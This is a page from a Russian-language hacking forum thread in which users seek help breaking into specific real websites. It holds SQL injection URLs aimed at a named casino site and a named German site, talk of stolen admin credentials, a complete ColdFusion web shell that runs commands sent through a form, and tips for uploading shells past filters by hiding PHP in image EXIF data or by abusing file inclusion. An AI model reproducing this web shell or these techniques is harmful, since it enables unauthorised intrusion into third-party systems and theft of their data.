Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    644
    Reputations:
    208
    Втф? Может быть ты хотел сказать сплойты? Поиск на милворме никто не отменял.
     
    5 people like this.
  2. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    this is .htaccess protection. you must load .htpasswd file, where passwords are stored
     
  3. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0
    Url уязвим

    http://slingogaming.com/slingo_casino_news-story.php?id=-2+UNION+SELECT+1--+

    Проблема в том, что я нашел админ-панели http://slingogaming.com/admin/account/

    , а также имя пользователя администратора и пароль электронной почте, но не подал выхода

    Так что теперь я хочу, чтобы загрузить на него снаряд

    и mysql.user: Host, пользователь, пароль и нашли

    поэтому, пожалуйста, теперь, как я могу загрузить оболочки на нем, либо получить. База данных SQL
     
  4. linuxkernal

    linuxkernal New Member

    Joined:
    12 Mar 2010
    Messages:
    62
    Likes Received:
    0
    Reputations:
    0

    Вы можете сказать мне, как к нагрузке. htpasswd файл
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    try load_file function and don't use translator ;)
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    PHP:
    html
    body

    cfoutput
    table
    form method="POST" action="cfexec.cfm"
     < 
    tr
      < 
    td>Command:</td
      < 
    td> < input type=text name="cmd" size=50cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td
     </
    tr
     < 
    tr
      < 
    td>Options:</td
      < 
    td> < input type=text name="opts" size=50 cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td
     </
    tr
     < 
    tr
      < 
    td>Timeout:</td
      < 
    td>< input type=text name="timeout" size=cfif isdefined("form.timeout")> value="#form.timeout#" cfelsevalue="5" </cfif> > </td
     </
    tr
    </
    table
    input type=submit value="Exec" 
    </
    FORM

    cfsavecontent variable="myVar"
    cfexecute name "#Form.cmd#" arguments "#Form.opts#" timeout "#Form.timeout#"
    </
    cfexecute
    </
    cfsavecontent
    pre
    #myVar# 
    </pre
    </
    cfoutput
    </
    body
    </
    html>  
    https://forum.antichat.ru/thread71680.html
     
  7. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    я это заливал, но учитывая что я с cfm ниразу, то хз почему н работает(всмысле то что я не могу найти ответ почему выдаёт ошибку)
    Code:
    The error occurred in E:\Inetpub\**\123.cfm: line 24
    
    22 : 
    23 : < cfsavecontent variable="myVar"> 
    24 : < cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> 
    25 : </cfexecute> 
    26 : </cfsavecontent> 
    
    
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,515
    Likes Received:
    400
    Reputations:
    196

    Во-первых, теги правильно пиши - убери пробелы до и после знаков ">" и "<".

    Во-вторых, имя файла должно быть "cfexec.cfm" либо поменяй в строке

    PHP:
    <form method="POST" action="cfexec.cfm> 
    название файла на своё.
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ребят не могу залить шелл, в админке есть место для загрузки картинок,но стоит хороший фильтр и на стороне сервера и на JS..

    при загрузке php файла вылетает aкошка JS и говорит что нельзя этот формат и тп, но файл все же загружается, но когда иду по линку файла то виден только один символ и пустая страница

    то есть если контент файла
    PHP:
    <?php phpinfo (); ?>
    то на странице видна только символ '<'
    остальное вырезается, попробовал загрузить в разных форматах..не катит

    на сайте еще есть LFI, впихнул пхп код в конце гиф файлa чтоб инклудить, нo фильтр обрезал пхп и оставил только сорцы gif..

    вот такая печальная история,нужен профи)

    поделитесь советами plz
     
    _________________________
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    А ты запиши в EXIF, а не в конец файла, и, если картинка меняет размер после заливки (скриптом), то попробуй залить картинку такого же размера, как и тестируемая - может и прокатит

    PS: Ну и потом, если есть LFI - есть и куча других способов - логи, сессия и etc.
     
    #13730 Pashkela, 21 Jun 2010
    Last edited: 21 Jun 2010
  11. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    так ошибка на 24ой строке же
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    СПАСИБО Pashkela, попробую
     
    _________________________
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    догнал уже, спс всем кто помог) тяжело было как для тупого объяснить?)
     
  14. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    sql inj - восстановление пароля

    всем привет. буду краток...с мобильного.
    выяснил, что данные из поля для восстановления пароля участвуют в запросе:
    select * from utbl where user=`o@lo.lo' or email='o@lo.lo'
    при ошибке выводится тело запроса...как выше
    ' - проходит в запрос
    ; - в исходниках страницы показан как &#(цифры) или как-то так, не помню.
    " - в каком виде, не проверил.
    вопрос: можно ли провести inj или что выжить из этого по максимуму:)?
     
  15. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    478
    Likes Received:
    483
    Reputations:
    99
    Если кавычка проходит нормально в запрос и выдается ошибка - то да, скуля, крутить юнионом.
     
  16. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    куда же результат будет выводиться¿
    ...лан, завтра буду пробовать:)
     
  17. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    478
    Likes Received:
    483
    Reputations:
    99
    Если не будут - крутить как слепую
    https://forum.antichat.ru/threadnav119047-2-10.html
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Через эту инъекцию ты можешь сменить пароль админа.
    Если, конечно, поля угадаешь.
     
  19. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Пля.. :( проверил, ' и " не проходят... попадают в запрос как &# 039; и &quot;
    Что в данном случае можно сделать? :confused:
     
    #13739 IMMORTAL_S, 22 Jun 2010
    Last edited: 22 Jun 2010
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ребят помогите со скулом

    http://www.editrans.de/?view=article&id=6+order+by+1
     
    _________________________
Loading...
Thread Status:
Not open for further replies.